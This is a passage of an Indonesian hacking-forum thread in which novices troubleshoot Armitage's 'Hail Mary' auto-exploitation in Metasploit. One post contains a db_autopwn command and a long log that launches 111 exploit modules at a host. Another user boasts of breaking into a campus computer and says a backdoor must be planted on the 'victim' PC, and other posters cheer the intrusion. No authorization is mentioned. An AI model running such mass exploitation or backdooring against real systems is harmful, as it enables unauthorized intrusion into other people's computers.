ARMITAGE >HAILMARY ...IT'S SO Easy
#81
(01-24-2012, 03:05 PM)konspirasi Wrote:
(01-24-2012, 01:47 PM)kuch1k1 Wrote: Nih Om aku bingung kalo buka armitage keluar conectnya kaya gini
Spoiler! :
[Image: 13zagjb.png]
beda kan sama punya TS
Terus kalo udah di klik connect keluar juga kaya gini
Spoiler! :
[Image: 2cp49yb.png]
ya ku pilih yes aja

Eh keluar dah tuh ARMITAGEnya cuma ko pas pilih attacks
ga ada pilihan attack by port dan by vulnerability
trus Hail mary juga ga ada pilihan by port dan by vulnerability

Tolong solisinya om,,...Angry

udah di scan blom targetnya?? sebelum ada pilihan attack port atau hailmary harus di scan dulu pake nmap atau msfscan

Itu yang atas pas baru buka armitage udah gitu
Connect nya beda sama TS
kalo TS kan ada use ssl dan tombolnya juga ada star msf
kalo ane kan ga ada

trus udah di scan nmap juga
tapi ttp ga ada by port dkk
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s

#82
sama kok dengan punya ane jd ga ada masalah, minta ss hasil scan nmapnya dong

#83
om ko pas di scan nmap nya kosong gini? apa ngaruh karna saya belum bikin database mysqlnya?

[Image: iwnl0m.png]

#84
lha itu hasil nmap 0 host up, ada host target ga?

#85
(08-17-2011, 04:25 PM)Alsad91 Wrote:
(08-17-2011, 02:56 PM)mocyn36 Wrote:
(08-17-2011, 01:08 PM)gtx150 Wrote:
(08-15-2011, 06:10 PM)Alsad91 Wrote: bank ane nanya ni..
itu ip router yang di masukin ip router qt ato gmana ya bang???
terus fungsi dari hailmary itu apaan ya bang???
ane uda hampir berhasil nih bang,
thanxz za atas tutornya....

ip router gateway bang
(08-16-2011, 05:16 AM)Alsad91 Wrote: ane udah berhasil connect armitage bro..........
tapi lum behasil masuk kompi target caranya gmana ya??
kok punya ane gak da icon kompi yang ada petirnya???padahal ane ud cb masuk ke Host > Nmap > Quick scan ( Os detect ), tp tetep g muncul tuh kompi tartget
cara agar bisa muncul icon kompi yang ada petirnya gmana ya bro???
mohon pencerahanya ya gannnnnnnnnnnnnnnnnnnnnn...............
thxz bro... semangat ni bro..........

agak lama bro keluar kompi targetnya, setelah nmap lalu jalankan hailmary.

kok punya ane jugak bisa ya bro???, setelah ane Nmap .quick scan (Os detected) kok tetp gak keluar ya boss, padahal uda keluar show message : scan complate, fine Attack > blala..bla... , bla...
knapa ya bro ???

wah.. sama bro.......
ane juga gt e, setelah ane Nmap > quick scan (Os detected) terus keluar show message :

Scan Complete !
Use Attacks ->>Find Attacks to suggest
Applicable exploits for your targets. > OK

terus keluar kompi target , tp kok hitam semua ya bos, gak da yang tampilan OS nya.
terus
ane HAILMARY > by port kok keluarnya cm ginian ya bos??

db_autopwn -r -e -p -R great
[*] (1/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.1.1:80...
[*] (2/111 [0 sessions]): Launching exploit/unix/webapp/phpmyadmin_config against 192.168.1.1:80...
[*] (3/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_snmp against 192.168.1.1:80...
[*] (4/111 [0 sessions]): Launching exploit/unix/webapp/guestbook_ssi_exec against 192.168.1.1:80...
[*] (5/111 [0 sessions]): Launching exploit/windows/http/httpdx_handlepeer against 192.168.1.1:80...
[*] (6/111 [0 sessions]): Launching exploit/unix/webapp/mitel_awc_exec against 192.168.1.1:80...
[*] (7/111 [0 sessions]): Launching exploit/windows/ftp/easyftp_mkd_fixret against 192.168.1.1:21...
[*] (8/111 [0 sessions]): Launching exploit/windows/ftp/httpdx_tolog_format against 192.168.1.1:21...
[*] (9/111 [0 sessions]): Launching exploit/unix/webapp/phpbb_highlight against 192.168.1.1:80...
[*] (10/111 [0 sessions]): Launching exploit/windows/http/navicopa_get_overflow against 192.168.1.1:80...
[*] (11/111 [0 sessions]): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.1.1:80...
[*] (12/111 [0 sessions]): Launching exploit/windows/ftp/easyftp_cwd_fixret against 192.168.1.1:21...
[*] (13/111 [0 sessions]): Launching exploit/windows/http/coldfusion_fckeditor against 192.168.1.1:80...
[*] (14/111 [0 sessions]): Launching exploit/windows/http/integard_password_bof against 192.168.1.1:80...
[*] (15/111 [0 sessions]): Launching exploit/windows/http/ca_arcserve_rpc_authbypass against 192.168.1.1:80...
[*] (16/111 [0 sessions]): Launching exploit/unix/webapp/cacti_graphimage_exec against 192.168.1.1:80...
[*] (17/111 [0 sessions]): Launching exploit/unix/webapp/generic_exec against 192.168.1.1:80...
[*] (18/111 [0 sessions]): Launching exploit/linux/ftp/proftp_telnet_iac against 192.168.1.1:21...
[*] (19/111 [0 sessions]): Launching exploit/linux/ftp/proftp_sreplace against 192.168.1.1:21...
[*] (20/111 [0 sessions]): Launching exploit/windows/http/easyftp_list against 192.168.1.1:80...
[*] (21/111 [0 sessions]): Launching exploit/multi/http/axis2_deployer against 192.168.1.1:80...
[*] (22/111 [0 sessions]): Launching exploit/windows/proxy/bluecoat_winproxy_host against 192.168.1.1:80...
[*] (23/111 [0 sessions]): Launching exploit/windows/ftp/globalscapeftp_input against 192.168.1.1:21...
[*] (24/111 [0 sessions]): Launching exploit/unix/webapp/awstatstotals_multisort against 192.168.1.1:80...
[*] (25/111 [0 sessions]): Launching exploit/unix/webapp/oracle_vm_agent_utl against 192.168.1.1:80...
[*] (26/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_hostname against 192.168.1.1:80...
[*] (27/111 [0 sessions]): Launching exploit/unix/webapp/redmine_scm_exec against 192.168.1.1:80...
[*] (28/111 [0 sessions]): Launching exploit/unix/webapp/barracuda_img_exec against 192.168.1.1:80...
[*] (29/111 [0 sessions]): Launching exploit/linux/http/ddwrt_cgibin_exec against 192.168.1.1:80...
[*] (30/111 [0 sessions]): Launching exploit/windows/http/hp_openview_insight_backdoor against 192.168.1.1:80...
[*] (31/111 [0 sessions]): Launching exploit/windows/http/adobe_robohelper_authbypass against 192.168.1.1:80...
[*] (32/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebhelp against 192.168.1.1:80...
[*] (33/111 [0 sessions]): Launching exploit/unix/webapp/twiki_history against 192.168.1.1:80...
[*] (34/111 [0 sessions]): Launching exploit/multi/http/jboss_deploymentfilerepository against 192.168.1.1:80...
[*] (35/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_icount against 192.168.1.1:80...
[*] (36/111 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.1.1:80...
[*] (37/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_snmpviewer_actapp against 192.168.1.1:80...
[*] (38/111 [0 sessions]): Launching exploit/windows/http/mailenable_auth_header against 192.168.1.1:80...
[*] (39/111 [0 sessions]): Launching exploit/unix/webapp/openx_banner_edit against 192.168.1.1:80...
[*] (40/111 [0 sessions]): Launching exploit/bsdi/softcart/mercantec_softcart against 192.168.1.1:80...
[*] (41/111 [0 sessions]): Launching exploit/windows/http/fdm_auth_header against 192.168.1.1:80...
[*] (42/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovalarm_lang against 192.168.1.1:80...
[*] (43/111 [0 sessions]): Launching exploit/windows/http/zenworks_uploadservlet against 192.168.1.1:80...
[*] (44/111 [0 sessions]): Launching exploit/windows/ftp/oracle9i_xdb_ftp_unlock against 192.168.1.1:21...
[*] (45/111 [0 sessions]): Launching exploit/linux/http/linksys_apply_cgi against 192.168.1.1:80...
[*] (46/111 [0 sessions]): Launching exploit/unix/webapp/php_xmlrpc_eval against 192.168.1.1:80...
[*] (47/111 [0 sessions]): Launching exploit/windows/http/badblue_passthru against 192.168.1.1:80...
[*] (48/111 [0 sessions]): Launching exploit/multi/realserver/describe against 192.168.1.1:80...
[*] (49/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil against 192.168.1.1:80...
[*] (50/111 [0 sessions]): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.1.1:80...
[*] (51/111 [0 sessions]): Launching exploit/unix/webapp/mambo_cache_lite against 192.168.1.1:80...
[*] (52/111 [0 sessions]): Launching exploit/unix/webapp/nagios3_statuswml_ping against 192.168.1.1:80...
[*] (53/111 [0 sessions]): Launching exploit/windows/http/novell_imanager_upload against 192.168.1.1:80...
[*] (54/111 [0 sessions]): Launching exploit/windows/iis/ms01_026_dbldecode against 192.168.1.1:80...
[*] (55/111 [0 sessions]): Launching exploit/windows/http/efs_easychatserver_username against 192.168.1.1:80...
[*] (56/111 [0 sessions]): Launching exploit/windows/ftp/vermillion_ftpd_port against 192.168.1.1:21...
[*] (57/111 [0 sessions]): Launching exploit/windows/ftp/wsftp_server_503_mkd against 192.168.1.1:21...
[*] (58/111 [0 sessions]): Launching exploit/freebsd/ftp/proftp_telnet_iac against 192.168.1.1:21...
[*] (59/111 [0 sessions]): Launching exploit/unix/http/contentkeeperweb_mimencode against 192.168.1.1:80...
[*] (60/111 [0 sessions]): Launching exploit/unix/webapp/php_include against 192.168.1.1:80...
[*] (61/111 [0 sessions]): Launching exploit/windows/http/apache_modjk_overflow against 192.168.1.1:80...
[*] (62/111 [0 sessions]): Launching exploit/windows/ftp/netterm_netftpd_user against 192.168.1.1:21...
[*] (63/111 [0 sessions]): Launching exploit/linux/http/piranha_passwd_exec against 192.168.1.1:80...
[*] (64/111 [0 sessions]): Launching exploit/multi/http/axis2_deployer_rest against 192.168.1.1:80...
[*] (65/111 [0 sessions]): Launching exploit/multi/wyse/hagent_untrusted_hsdata against 192.168.1.1:80...
[*] (66/111 [0 sessions]): Launching exploit/solaris/telnet/fuser against 192.168.1.1:23...
[*] (67/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_openview5 against 192.168.1.1:80...
[*] (68/111 [0 sessions]): Launching exploit/unix/webapp/oscommerce_filemanager against 192.168.1.1:80...
[*] (69/111 [0 sessions]): Launching exploit/unix/webapp/citrix_access_gateway_exec against 192.168.1.1:80...
[*] (70/111 [0 sessions]): Launching exploit/unix/webapp/sphpblog_file_upload against 192.168.1.1:80...
[*] (71/111 [0 sessions]): Launching exploit/windows/http/ipswitch_wug_maincfgret against 192.168.1.1:80...
[*] (72/111 [0 sessions]): Launching exploit/windows/ftp/ms09_053_ftpd_nlst against 192.168.1.1:21...
[*] (73/111 [0 sessions]): Launching exploit/unix/ftp/vsftpd_234_backdoor against 192.168.1.1:21...
[*] (74/111 [0 sessions]): Launching exploit/windows/ftp/slimftpd_list_concat against 192.168.1.1:21...
[*] (75/111 [0 sessions]): Launching exploit/multi/http/jboss_bshdeployer against 192.168.1.1:80...
[*] (76/111 [0 sessions]): Launching exploit/unix/webapp/joomla_tinybrowser against 192.168.1.1:80...
[*] (77/111 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.1.1:80...
[*] (78/111 [0 sessions]): Launching exploit/windows/http/apache_mod_rewrite_ldap against 192.168.1.1:80...
[*] (79/111 [0 sessions]): Launching exploit/multi/http/spree_searchlogic_exec against 192.168.1.1:80...
[*] (80/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_toolbar_01 against 192.168.1.1:80...
[*] (81/111 [0 sessions]): Launching exploit/unix/webapp/php_wordpress_lastpost against 192.168.1.1:80...
[*] (82/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_webappmon_execvp against 192.168.1.1:80...
[*] (83/111 [0 sessions]): Launching exploit/unix/webapp/dogfood_spell_exec against 192.168.1.1:80...
[*] (84/111 [0 sessions]): Launching exploit/multi/http/tomcat_mgr_deploy against 192.168.1.1:80...
[*] (85/111 [0 sessions]): Launching exploit/unix/webapp/base_qry_common against 192.168.1.1:80...
[*] (86/111 [0 sessions]): Launching exploit/unix/webapp/openview_connectednodes_exec against 192.168.1.1:80...
[*] (87/111 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 192.168.1.1:80...
[*] (88/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro against 192.168.1.1:80...
[*] (89/111 [0 sessions]): Launching exploit/windows/http/edirectory_imonitor against 192.168.1.1:80...
[*] (90/111 [0 sessions]): Launching exploit/windows/http/badblue_ext_overflow against 192.168.1.1:80...
[*] (91/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_webappmon_ovjavalocale against 192.168.1.1:80...
[*] (92/111 [0 sessions]): Launching exploit/windows/iis/iis_webdav_upload_asp against 192.168.1.1:80...
[*] (93/111 [0 sessions]): Launching exploit/multi/http/freenas_exec_raw against 192.168.1.1:80...
[*] (94/111 [0 sessions]): Launching exploit/windows/ftp/easyftp_list_fixret against 192.168.1.1:21...
[*] (95/111 [0 sessions]): Launching exploit/unix/webapp/twiki_search against 192.168.1.1:80...
[*] (96/111 [0 sessions]): Launching exploit/windows/http/sapdb_webtools against 192.168.1.1:80...
[*] (97/111 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against 192.168.1.1:80...
[*] (98/111 [0 sessions]): Launching exploit/unix/webapp/pajax_remote_exec against 192.168.1.1:80...
[*] (99/111 [0 sessions]): Launching exploit/windows/http/httpdx_tolog_format against 192.168.1.1:80...
[*] (100/111 [0 sessions]): Launching exploit/multi/ftp/wuftpd_site_exec_format against 192.168.1.1:21...
[*] (101/111 [0 sessions]): Launching exploit/multi/http/sun_jsws_dav_options against 192.168.1.1:80...
[*] (102/111 [0 sessions]): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.1.1:80...
[*] (103/111 [0 sessions]): Launching exploit/multi/http/glassfish_deployer against 192.168.1.1:80...
[*] (104/111 [0 sessions]): Launching exploit/solaris/telnet/ttyprompt against 192.168.1.1:23...
[*] (105/111 [0 sessions]): Launching exploit/windows/iis/ms03_007_ntdll_webdav against 192.168.1.1:80...
[*] (106/111 [0 sessions]): Launching exploit/windows/http/savant_31_overflow against 192.168.1.1:80...
[*] (107/111 [0 sessions]): Launching exploit/unix/ftp/proftpd_133c_backdoor against 192.168.1.1:21...
[*] (108/111 [0 sessions]): Launching exploit/unix/webapp/php_vbulletin_template against 192.168.1.1:80...
[*] (109/111 [0 sessions]): Launching exploit/windows/ftp/oracle9i_xdb_ftp_pass against 192.168.1.1:21...
[*] (110/111 [0 sessions]): Launching exploit/windows/http/intersystems_cache against 192.168.1.1:80...
[*] (111/111 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_main against 192.168.1.1:80...
[*] (111/111 [0 sessions]): Waiting on 24 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 14 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 5 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 5 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 4 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 4 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 4 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (111/111 [0 sessions]): Waiting on 0 launched modules to finish execution...


kok gak muncul kompi target yang ada petirnya itu ya bro???
berkali2 ane coba terus gt ya bro???
mohon pencerahanya para brother IBT
trims

Itu port target yang open cuman port 80, 23 sama 21 ya bro???
Soalnya exploitnya cuman yang berhubungan dengan port 80, 23 dan 21...

O, iya tu metasploitnya dah update apa blum bro???
*Mungkin kalau manual pentest di port 80 bisa dapat phpmyadmin (tapi agak melenceng dari tema armitage)

Mohon koreksinya dari brother kalau jawaban saya salah.. Smile
pengguna baru hehehehehe.....

#86
Wink 
Jajal ahhh....
<< Back | Track

#87
itu bisa di coba untuk masuk ke OS Windows y Om ?

#88
(11-27-2011, 12:27 AM)gtx150 Wrote:
(11-04-2011, 05:07 PM)anacia Wrote: makasih brother...
sekali coba langsung berhasil masuk ke komputer kampus saya.

- Setelah saya suruh dosen menghidupkan firewall, tiba2 koneksi terpustus.
jadi intinya firewall dan antivirus masih bisa mem-block armitage.
Jadi harus tanam backdoor ke PC korban.

Ini screenshot dari BT 5 saya, masuk ke komputer kampus.
:badpc:

[Image: ngrfnl.png]

weehhh ada yg kena petir tuh....mantap om.

:badpc: maaf saya cewe om.. Tongue

#89
(03-21-2012, 04:34 PM)anacia Wrote:
(11-27-2011, 12:27 AM)gtx150 Wrote:
(11-04-2011, 05:07 PM)anacia Wrote: makasih brother...
sekali coba langsung berhasil masuk ke komputer kampus saya.

- Setelah saya suruh dosen menghidupkan firewall, tiba2 koneksi terpustus.
jadi intinya firewall dan antivirus masih bisa mem-block armitage.
Jadi harus tanam backdoor ke PC korban.

Ini screenshot dari BT 5 saya, masuk ke komputer kampus.
:badpc:

[Image: ngrfnl.png]

weehhh ada yg kena petir tuh....mantap om.

:badpc: maaf saya cewe om.. Tongue

wew ada cewek ternyata Tongue
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#90
mau nanyak neh om..
ane khan pakek modem sm*rt flen..
kira2 bisa kgk yah armitage nyah jalan..
alnyah waktu mau scan pakek nmap..
kgk da muncul om ip target nyah..
mohon pencerahan..
maap klo ade salah2 kate ..
maklum nubi...
^_^






Users browsing this thread: 3 Guest(s)